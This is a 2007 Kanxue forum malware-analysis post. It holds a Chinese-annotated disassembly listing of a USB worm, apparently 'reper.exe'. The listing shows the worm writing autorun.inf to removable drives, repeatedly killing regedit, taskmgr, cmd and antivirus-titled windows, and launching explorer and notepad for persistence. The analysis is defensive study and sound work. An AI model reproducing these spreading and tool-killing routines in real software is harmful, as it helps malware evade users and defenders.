00401FF5 . 68 098A4100 PUSH A0002798.00418A09 ; SE 处理程序安装
00401FFA . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00402000 . 50 PUSH EAX
00402001 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
00402008 . 81EC B0000000 SUB ESP,0B0
0040200E . 53 PUSH EBX
0040200F . 56 PUSH ESI
00402010 . 57 PUSH EDI
00402011 . 8DBD 44FFFFFF LEA EDI,DWORD PTR SS:[EBP-BC]
00402017 . B9 2C000000 MOV ECX,2C
0040201C . B8 CCCCCCCC MOV EAX,CCCCCCCC
00402021 . F3:AB REP STOS DWORD PTR ES:[EDI]
00402023 . 6A 01 PUSH 1 ; /Arg1 = 00000001
00402025 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00402028 . E8 83050000 CALL A0002798.004025B0 ; \A0002798.004025B0
0040202D . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00402034 . A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C]
00402039 . 50 PUSH EAX ; /Arg3 => 000001A4
0040203A . 6A 01 PUSH 1 ; |Arg2 = 00000001
0040203C . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
0040203F . 51 PUSH ECX ; |Arg1
00402040 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00402043 . E8 780C0000 CALL A0002798.00402CC0 ; \A0002798.00402CC0
00402048 . 6A 1A PUSH 1A ; /Arg2 = 0000001A
0040204A . 8D55 8C LEA EDX,DWORD PTR SS:[EBP-74] ; |
0040204D . 52 PUSH EDX ; |Arg1
0040204E . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00402051 . E8 8A2A0000 CALL A0002798.00404AE0 ; \A0002798.00404AE0
00402056 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
00402059 . E8 E20C0000 CALL A0002798.00402D40
0040205E . C645 A5 00 MOV BYTE PTR SS:[EBP-5B],0
00402062 . 68 44A04200 PUSH A0002798.0042A044 ; ASCII "[autorun]" //开始在U盘里写AUTORUN.INF....
00402067 . 8D45 8C LEA EAX,DWORD PTR SS:[EBP-74]
0040206A . 50 PUSH EAX
0040206B . E8 E04D0000 CALL A0002798.00406E50
00402070 . 83C4 08 ADD ESP,8
00402073 . 85C0 TEST EAX,EAX
00402075 . 74 30 JE SHORT A0002798.004020A7
00402077 . 68 50A04200 PUSH A0002798.0042A050 ; ASCII "open=reper.exe" //看来这个程序的原文件名就是这个了
0040207C . 8D4D 8C LEA ECX,DWORD PTR SS:[EBP-74]
0040207F . 51 PUSH ECX
00402080 . E8 CB4D0000 CALL A0002798.00406E50
00402085 . 83C4 08 ADD ESP,8
00402088 . 85C0 TEST EAX,EAX
0040208A . 74 1B JE SHORT A0002798.004020A7
0040208C . C745 88 01000>MOV DWORD PTR SS:[EBP-78],1
00402093 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
0040209A . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
0040209D . E8 90EFFFFF CALL A0002798.00401032
004020A2 . 8B45 88 MOV EAX,DWORD PTR SS:[EBP-78]
004020A5 . EB 19 JMP SHORT A0002798.004020C0
004020A7 > C745 84 00000>MOV DWORD PTR SS:[EBP-7C],0
004020AE . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
004020B5 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
004020B8 . E8 75EFFFFF CALL A0002798.00401032
004020BD . 8B45 84 MOV EAX,DWORD PTR SS:[EBP-7C]
004020C0 > 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004020C3 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004020CA . 5F POP EDI
004020CB . 5E POP ESI
004020CC . 5B POP EBX
004020CD . 81C4 BC000000 ADD ESP,0BC
004020D3 . 3BEC CMP EBP,ESP
004020D5 . E8 06470000 CALL A0002798.004067E0
004020DA . 8BE5 MOV ESP,EBP
004020DC . 5D POP EBP
004020DD . C3 RETN
004021C0 /> \55 PUSH EBP
004021C1 |. 8BEC MOV EBP,ESP
004021C3 |. 81EC 70010000 SUB ESP,170
004021C9 |. 53 PUSH EBX
004021CA |. 56 PUSH ESI
004021CB |. 57 PUSH EDI
004021CC |. 8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
004021D2 |. B9 5C000000 MOV ECX,5C
004021D7 |. B8 CCCCCCCC MOV EAX,CCCCCCCC
004021DC |. F3:AB REP STOS DWORD PTR ES:[EDI]
004021DE |> B8 01000000 /MOV EAX,1
004021E3 |. 85C0 |TEST EAX,EAX
004021E5 |. 0F84 F1010000 |JE A0002798.004023DC
004021EB |. C745 FC 00000>|MOV DWORD PTR SS:[EBP-4],0
004021F2 |. C785 D4FEFFFF>|MOV DWORD PTR SS:[EBP-12C],0
004021FC |. B9 49000000 |MOV ECX,49
00402201 |. 33C0 |XOR EAX,EAX
00402203 |. 8DBD D8FEFFFF |LEA EDI,DWORD PTR SS:[EBP-128]
00402209 |. F3:AB |REP STOS DWORD PTR ES:[EDI]
0040220B |. 6A 00 |PUSH 0 ; /ProcessID = 0
0040220D |. 6A 02 |PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
0040220F |. E8 08030000 |CALL <JMP.&KERNEL32.CreateToolhelp32Sna>; \CreateToolhelp32Snapshot // 应该是截图吧
00402214 |. 8945 FC |MOV DWORD PTR SS:[EBP-4],EAX
00402217 |. C785 D4FEFFFF>|MOV DWORD PTR SS:[EBP-12C],128
00402221 |. 8D8D D4FEFFFF |LEA ECX,DWORD PTR SS:[EBP-12C]
00402227 |. 51 |PUSH ECX ; /pProcessentry
00402228 |. 8B55 FC |MOV EDX,DWORD PTR SS:[EBP-4] ; |
0040222B |. 52 |PUSH EDX ; |hSnapshot
0040222C |. E8 E5020000 |CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00402231 |> 8BF4 |/MOV ESI,ESP
00402233 |. 8D85 F8FEFFFF ||LEA EAX,DWORD PTR SS:[EBP-108]
00402239 |. 50 ||PUSH EAX ; /StringOrChar
0040223A |. FF15 2C144300 ||CALL DWORD PTR DS:[<&USER32.CharLowerA>; \CharLowerA
00402240 |. 3BF4 ||CMP ESI,ESP
00402242 |. E8 99450000 ||CALL A0002798.004067E0
00402247 |. 8985 D0FEFFFF ||MOV DWORD PTR SS:[EBP-130],EAX ; 碰上下面几个喀掉
0040224D |. 68 98A04200 ||PUSH A0002798.0042A098 ; ASCII "regedit.exe"
00402252 |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
00402258 |. 51 ||PUSH ECX
00402259 |. E8 F24B0000 ||CALL A0002798.00406E50
0040225E |. 83C4 08 ||ADD ESP,8
00402261 |. 85C0 ||TEST EAX,EAX
00402263 |. 75 48 ||JNZ SHORT A0002798.004022AD
00402265 |. 68 14A14200 ||PUSH A0002798.0042A114 ; ASCII "taskmgr.exe"
0040226A |. 8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
00402270 |. 52 ||PUSH EDX
00402271 |. E8 DA4B0000 ||CALL A0002798.00406E50
00402276 |. 83C4 08 ||ADD ESP,8
00402279 |. 85C0 ||TEST EAX,EAX
0040227B |. 75 30 ||JNZ SHORT A0002798.004022AD
0040227D |. 68 08A14200 ||PUSH A0002798.0042A108 ; ASCII "cmd.exe"
00402282 |. 8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
00402288 |. 50 ||PUSH EAX
00402289 |. E8 C24B0000 ||CALL A0002798.00406E50
0040228E |. 83C4 08 ||ADD ESP,8
00402291 |. 85C0 ||TEST EAX,EAX
00402293 |. 75 18 ||JNZ SHORT A0002798.004022AD
00402295 |. 68 E4A14200 ||PUSH A0002798.0042A1E4 ; ASCII "ntvdm.exe"
0040229A |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
004022A0 |. 51 ||PUSH ECX
004022A1 |. E8 AA4B0000 ||CALL A0002798.00406E50
004022A6 |. 83C4 08 ||ADD ESP,8
004022A9 |. 85C0 ||TEST EAX,EAX
004022AB |. 74 2F ||JE SHORT A0002798.004022DC
004022AD |> 8BF4 ||MOV ESI,ESP
004022AF |. 6A 01 ||PUSH 1
004022B1 |. 8BFC ||MOV EDI,ESP
004022B3 |. 8B95 DCFEFFFF ||MOV EDX,DWORD PTR SS:[EBP-124]
004022B9 |. 52 ||PUSH EDX ; /ProcessId
004022BA |. 6A 00 ||PUSH 0 ; |Inheritable = FALSE
004022BC |. 68 FF0F1F00 ||PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
004022C1 |. FF15 E0124300 ||CALL DWORD PTR DS:[<&KERNEL32.OpenProc>; \OpenProcess.开始枚举了
004022C7 |. 3BFC ||CMP EDI,ESP
004022C9 |. E8 12450000 ||CALL A0002798.004067E0
004022CE |. 50 ||PUSH EAX ; |hProcess
004022CF |. FF15 DC124300 ||CALL DWORD PTR DS:[<&KERNEL32.Terminat>; \TerminateProcess
004022D5 |. 3BF4 ||CMP ESI,ESP
004022D7 |. E8 04450000 ||CALL A0002798.004067E0
004022DC |> 68 D4A14200 ||PUSH A0002798.0042A1D4 ; ASCII "proc"
004022E1 |. 8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
004022E7 |. 50 ||PUSH EAX
004022E8 |. E8 634B0000 ||CALL A0002798.00406E50
004022ED |. 83C4 08 ||ADD ESP,8
004022F0 |. 85C0 ||TEST EAX,EAX
004022F2 |. 75 78 ||JNZ SHORT A0002798.0040236C
004022F4 |. 68 C8A14200 ||PUSH A0002798.0042A1C8
004022F9 |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
004022FF |. 51 ||PUSH ECX
00402300 |. E8 4B4B0000 ||CALL A0002798.00406E50
00402305 |. 83C4 08 ||ADD ESP,8
00402308 |. 85C0 ||TEST EAX,EAX
0040230A |. 75 60 ||JNZ SHORT A0002798.0040236C
0040230C |. 68 BCA14200 ||PUSH A0002798.0042A1BC ; //这里OD看不见,用C32ASM分析的是碰上窗口有“任务”的就喀嚓
00402311 |. 8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
00402317 |. 52 ||PUSH EDX
00402318 |. E8 334B0000 ||CALL A0002798.00406E50
0040231D |. 83C4 08 ||ADD ESP,8
00402320 |. 85C0 ||TEST EAX,EAX
00402322 |. 75 48 ||JNZ SHORT A0002798.0040236C
00402324 |. 68 B4A14200 ||PUSH A0002798.0042A1B4
00402329 |. 8B85 D0FEFFFF ||MOV EAX,DWORD PTR SS:[EBP-130]
0040232F |. 50 ||PUSH EAX
00402330 |. E8 1B4B0000 ||CALL A0002798.00406E50
00402335 |. 83C4 08 ||ADD ESP,8
00402338 |. 85C0 ||TEST EAX,EAX
0040233A |. 75 30 ||JNZ SHORT A0002798.0040236C
0040233C |. 68 ACA14200 ||PUSH A0002798.0042A1AC ; //这里OD看不见,用C32ASM分析的是碰上窗口有“木马”的就喀嚓
00402341 |. 8B8D D0FEFFFF ||MOV ECX,DWORD PTR SS:[EBP-130]
00402347 |. 51 ||PUSH ECX
00402348 |. E8 034B0000 ||CALL A0002798.00406E50
0040234D |. 83C4 08 ||ADD ESP,8
00402350 |. 85C0 ||TEST EAX,EAX
00402352 |. 75 18 ||JNZ SHORT A0002798.0040236C
00402354 |. 68 A4A14200 ||PUSH A0002798.0042A1A4 ; //这里OD看不见,用C32ASM分析的是碰上窗口有“杀”的就喀嚓
00402359 |. 8B95 D0FEFFFF ||MOV EDX,DWORD PTR SS:[EBP-130]
0040235F |. 52 ||PUSH EDX
00402360 |. E8 EB4A0000 ||CALL A0002798.00406E50
00402365 |. 83C4 08 ||ADD ESP,8
00402368 |. 85C0 ||TEST EAX,EAX
0040236A |. 74 2F ||JE SHORT A0002798.0040239B
0040236C |> 8BF4 ||MOV ESI,ESP
0040236E |. 6A 01 ||PUSH 1
00402370 |. 8BFC ||MOV EDI,ESP
00402372 |. 8B85 DCFEFFFF ||MOV EAX,DWORD PTR SS:[EBP-124]
00402378 |. 50 ||PUSH EAX ; /ProcessId
00402379 |. 6A 00 ||PUSH 0 ; |Inheritable = FALSE
0040237B |. 68 FF0F1F00 ||PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00402380 |. FF15 E0124300 ||CALL DWORD PTR DS:[<&KERNEL32.OpenProc>; \OpenProcess
00402386 |. 3BFC ||CMP EDI,ESP
00402388 |. E8 53440000 ||CALL A0002798.004067E0
0040238D |. 50 ||PUSH EAX ; |hProcess
0040238E |. FF15 DC124300 ||CALL DWORD PTR DS:[<&KERNEL32.Terminat>; \TerminateProcess
00402394 |. 3BF4 ||CMP ESI,ESP
00402396 |. E8 45440000 ||CALL A0002798.004067E0
0040239B |> 8D8D D4FEFFFF ||LEA ECX,DWORD PTR SS:[EBP-12C]
004023A1 |. 51 ||PUSH ECX ; /pProcessentry
004023A2 |. 8B55 FC ||MOV EDX,DWORD PTR SS:[EBP-4] ; |
004023A5 |. 52 ||PUSH EDX ; |hSnapshot
004023A6 |. E8 59010000 ||CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
004023AB |. 85C0 ||TEST EAX,EAX
004023AD |.^ 0F85 7EFEFFFF |\JNZ A0002798.00402231
004023B3 |. 8BF4 |MOV ESI,ESP
004023B5 |. 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4]
004023B8 |. 50 |PUSH EAX ; /hObject
004023B9 |. FF15 D4124300 |CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
004023BF |. 3BF4 |CMP ESI,ESP
004023C1 |. E8 1A440000 |CALL A0002798.004067E0
004023C6 |. 8BF4 |MOV ESI,ESP
004023C8 |. 6A 64 |PUSH 64 ; /Timeout = 100. ms
004023CA |. FF15 D0124300 |CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
004023D0 |. 3BF4 |CMP ESI,ESP
004023D2 |. E8 09440000 |CALL A0002798.004067E0
004023D7 |.^ E9 02FEFFFF \JMP A0002798.004021DE
004023DC |> 33C0 XOR EAX,EAX
004023DE |. 5F POP EDI
004023DF |. 5E POP ESI
004023E0 |. 5B POP EBX
004023E1 |. 81C4 70010000 ADD ESP,170
004023E7 |. 3BEC CMP EBP,ESP
004023E9 |. E8 F2430000 CALL A0002798.004067E0
004023EE |. 8BE5 MOV ESP,EBP
004023F0 |. 5D POP EBP
004023F1 \. C2 0400 RETN 4
0041365F . 51 PUSH ECX ; /Arg4
00413660 . 68 F8EB4200 PUSH A0002798.0042EBF8 ; |Arg3 = 0042EBF8
00413665 . 68 80A14200 PUSH A0002798.0042A180 ; |; |Arg2 = 0042A180 ASCII "%sexplorer.exe %s" //看来又对EXPLORER做了手脚,估计是插入线程
0041366A . 8D95 ACFDFFFF LEA EDX,DWORD PTR SS:[EBP-254] ; |
00413670 . 52 PUSH EDX ; |Arg1
00413671 . E8 8A2FFFFF CALL A0002798.00406600 ; \A0002798.00406600
00413676 . 83C4 10 ADD ESP,10
00413679 . 8BF4 MOV ESI,ESP
0041367B . 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
0041367E . 50 PUSH EAX ; /pProcessInfo
0041367F . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00413682 . 51 PUSH ECX ; |pStartupInfo
00413683 . 6A 00 PUSH 0 ; |CurrentDir = NULL
00413685 . 6A 00 PUSH 0 ; |pEnvironment = NULL
00413687 . 6A 20 PUSH 20 ; |CreationFlags = NORMAL_PRIORITY_CLASS
00413689 . 6A 00 PUSH 0 ; |InheritHandles = FALSE
0041368B . 6A 00 PUSH 0 ; |pThreadSecurity = NULL
0041368D . 6A 00 PUSH 0 ; |pProcessSecurity = NULL
0041368F . 8D95 ACFDFFFF LEA EDX,DWORD PTR SS:[EBP-254] ; |
00413695 . 52 PUSH EDX ; |CommandLine
00413696 . 6A 00 PUSH 0 ; |ModuleFileName = NULL
00413698 . FF15 F8124300 CALL DWORD PTR DS:[<&KERNEL32.CreateProc>; \CreateProcessA
0041369E . 3BF4 CMP ESI,ESP
004136A0 . E8 3B31FFFF CALL A0002798.004067E0
004136A5 > 8BF4 MOV ESI,ESP
004136A7 . FF15 60134300 CALL DWORD PTR DS:[<&KERNEL32.GetCommand>; [GetCommandLineA
004136AD . 3BF4 CMP ESI,ESP
004136AF . E8 2C31FFFF CALL A0002798.004067E0
004136B4 . 8985 A4FDFFFF MOV DWORD PTR SS:[EBP-25C],EAX ; 我们的TXT文档……
004136BA . 68 3CA04200 PUSH A0002798.0042A03C ; ASCII ".txt"
004136BF . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
004136C5 . 50 PUSH EAX
004136C6 . E8 8537FFFF CALL A0002798.00406E50
004136CB . 83C4 08 ADD ESP,8
004136CE . 85C0 TEST EAX,EAX
004136D0 . 75 1C JNZ SHORT A0002798.004136EE
004136D2 . 68 28A04200 PUSH A0002798.0042A028 ; ASCII ".TXT"
004136D7 . 8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C]
004136DD . 51 PUSH ECX
004136DE . E8 6D37FFFF CALL A0002798.00406E50
004136E3 . 83C4 08 ADD ESP,8
004136E6 . 85C0 TEST EAX,EAX
004136E8 . 0F84 5E010000 JE A0002798.0041384C
004136EE > C785 9CFCFFFF>MOV DWORD PTR SS:[EBP-364],0
004136F8 . EB 0F JMP SHORT A0002798.00413709
004136FA > 8B95 9CFCFFFF MOV EDX,DWORD PTR SS:[EBP-364]
00413700 . 83C2 01 ADD EDX,1
00413703 . 8995 9CFCFFFF MOV DWORD PTR SS:[EBP-364],EDX
00413709 > 81BD 9CFCFFFF>CMP DWORD PTR SS:[EBP-364],0DC
00413713 . 0F8D B5000000 JGE A0002798.004137CE
00413719 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
0041371F . 0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
00413725 . 8B8D 9CFCFFFF MOV ECX,DWORD PTR SS:[EBP-364]
0041372B . 8A50 20 MOV DL,BYTE PTR DS:[EAX+20]
0041372E . 88940D A4FCFF>MOV BYTE PTR SS:[EBP+ECX-35C],DL
00413735 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
0041373B . 0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
00413741 . 8A48 1D MOV CL,BYTE PTR DS:[EAX+1D]
00413744 . 888D A0FCFFFF MOV BYTE PTR SS:[EBP-360],CL
0041374A . 8B95 A4FDFFFF MOV EDX,DWORD PTR SS:[EBP-25C]
00413750 . 0395 9CFCFFFF ADD EDX,DWORD PTR SS:[EBP-364]
00413756 . 8A42 1E MOV AL,BYTE PTR DS:[EDX+1E]
00413759 . 8885 A1FCFFFF MOV BYTE PTR SS:[EBP-35F],AL
0041375F . 8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C]
00413765 . 038D 9CFCFFFF ADD ECX,DWORD PTR SS:[EBP-364]
0041376B . 8A51 1F MOV DL,BYTE PTR DS:[ECX+1F]
0041376E . 8895 A2FCFFFF MOV BYTE PTR SS:[EBP-35E],DL
00413774 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
0041377A . 0385 9CFCFFFF ADD EAX,DWORD PTR SS:[EBP-364]
00413780 . 8A48 20 MOV CL,BYTE PTR DS:[EAX+20]
00413783 . 888D A3FCFFFF MOV BYTE PTR SS:[EBP-35D],CL
00413789 . 68 3CA04200 PUSH A0002798.0042A03C ; ASCII ".txt"
0041378E . 8D95 A0FCFFFF LEA EDX,DWORD PTR SS:[EBP-360]
00413794 . 52 PUSH EDX
00413795 . E8 B636FFFF CALL A0002798.00406E50
0041379A . 83C4 08 ADD ESP,8
0041379D . 85C0 TEST EAX,EAX
0041379F . 75 18 JNZ SHORT A0002798.004137B9
004137A1 . 68 28A04200 PUSH A0002798.0042A028 ; ASCII ".TXT"
004137A6 . 8D85 A0FCFFFF LEA EAX,DWORD PTR SS:[EBP-360]
004137AC . 50 PUSH EAX
004137AD . E8 9E36FFFF CALL A0002798.00406E50
004137B2 . 83C4 08 ADD ESP,8
004137B5 . 85C0 TEST EAX,EAX
004137B7 . 74 10 JE SHORT A0002798.004137C9
004137B9 > 8B8D 9CFCFFFF MOV ECX,DWORD PTR SS:[EBP-364]
004137BF . C6840D A5FCFF>MOV BYTE PTR SS:[EBP+ECX-35B],0
004137C7 . EB 05 JMP SHORT A0002798.004137CE
004137C9 >^ E9 2CFFFFFF JMP A0002798.004136FA
004137CE > 8D95 A4FCFFFF LEA EDX,DWORD PTR SS:[EBP-35C]
004137D4 . 52 PUSH EDX
004137D5 . 8B85 A4FDFFFF MOV EAX,DWORD PTR SS:[EBP-25C]
004137DB . 50 PUSH EAX
004137DC . E8 3F30FFFF CALL A0002798.00406820
004137E1 . 83C4 08 ADD ESP,8
004137E4 . 8BF4 MOV ESI,ESP
004137E6 . 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL
004137E8 . 6A 00 PUSH 0 ; |Title = NULL
004137EA . 8B8D A4FDFFFF MOV ECX,DWORD PTR SS:[EBP-25C] ; |
004137F0 . 51 PUSH ECX ; |Text
004137F1 . 6A 00 PUSH 0 ; |hOwner = NULL
004137F3 . FF15 78144300 CALL DWORD PTR DS:[<&USER32.MessageBoxA>>; \MessageBoxA
004137F9 . 3BF4 CMP ESI,ESP
004137FB . E8 E02FFFFF CALL A0002798.004067E0
00413800 . 8B95 A4FDFFFF MOV EDX,DWORD PTR SS:[EBP-25C]
00413806 . 52 PUSH EDX ; /Arg4
00413807 . 68 F8EB4200 PUSH A0002798.0042EBF8 ; |Arg3 = 0042EBF8
0041380C . 68 5CA14200 PUSH A0002798.0042A15C ; ||Arg2 = 0042A15C ASCII "%snotepad.exe %s" //该NOTEPAD倒霉了
00413811 . 8D85 ACFDFFFF LEA EAX,DWORD PTR SS:[EBP-254] ; |
00413817 . 50 PUSH EAX ; |Arg1
00413818 . E8 E32DFFFF CALL A0002798.00406600 ; \A0002798.00406600
--------------------------------------------------------------------------------
【经验总结】
终于分析完了,555555555,刚才点了个F4,幸好没直接在关键部分,否则…………
呵呵:)希望斑竹鼓励新人,能+个声望(您上次扣了一个,将功补过:P)要不然就【我都不敢写了,上次这么写CCD就骂我来着:( 如果您觉得怎么样,就怎么样吧,别又扣一个:)】
--------------------------------------------------------------------------------
【版权声明】: 本文原创于看雪技术论坛, 转载请注明作者并保持文章的完整, 谢谢!
2007年06月03日 下午 10:35:08
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
- [原创]SysWOW64的奇技淫巧 8501
- [原创]IoSkipCurrentIrpStackLocation等IO栈处理API的一些探索 8325
- [讨论]重新入坑的一些思考 3536
- [讨论]好久不来看雪了 2548
- [求助]有没有好玩点的CM 4577
看原图
赞赏
雪币:
留言: